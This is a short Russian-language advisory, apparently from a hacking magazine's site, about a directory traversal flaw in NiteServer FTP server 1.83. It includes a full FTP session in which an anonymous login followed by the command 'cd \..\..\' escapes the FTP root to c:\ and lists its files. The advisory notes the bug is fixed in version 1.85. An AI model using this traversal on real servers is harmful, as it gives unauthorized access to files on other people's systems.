Хакер #305. Многошаговые SQL-инъекции
NiteServer – простой FTР сервер с некоторыми специфическими особенностями. В программе обнаружена возможность обхода каталога несколькими способами.
NiteServer не в состоянии фильтровать последовательность "\.." в FTP командах, в результате удаленный атакующий может выйти за пределы разрешенных директорий и получить доступ к произвольным файлам на уязвимой системе. Пример:
Connected to 192.168.1.22.
220- Niteserver Version:1.83
220- Author:Thomas Krebs
220- email: turtie@knuut.de
220- Welcome to the Niteserver
220- First Author:Thomas Krebs!
220-
220
User (192.168.1.22:(none)): anonymous
331 User anonymous accepted, send password.....
Password:
230 User anonymous accepted, ok come on.....
ftp> ls
200 PORT command ok....
257 "c:/ftpd/data" is working directory...c:\ftpd\data
ftp> cd /
250 Directory changed to"c:\ftpd\data" .
ftp> cd ..
250 Directory changed to"c:\ftpd\data" .
ftp> cd \..\..\
250 Directory changed to"c:\" .
ftp> ls
200 PORT command ok....
257 "c:/" is working directory...c:\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
.......
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> bye
221 Goodbye.
Уязвимость обнаружена в NITE ftp-server version 1.83 и устранена в 1.85.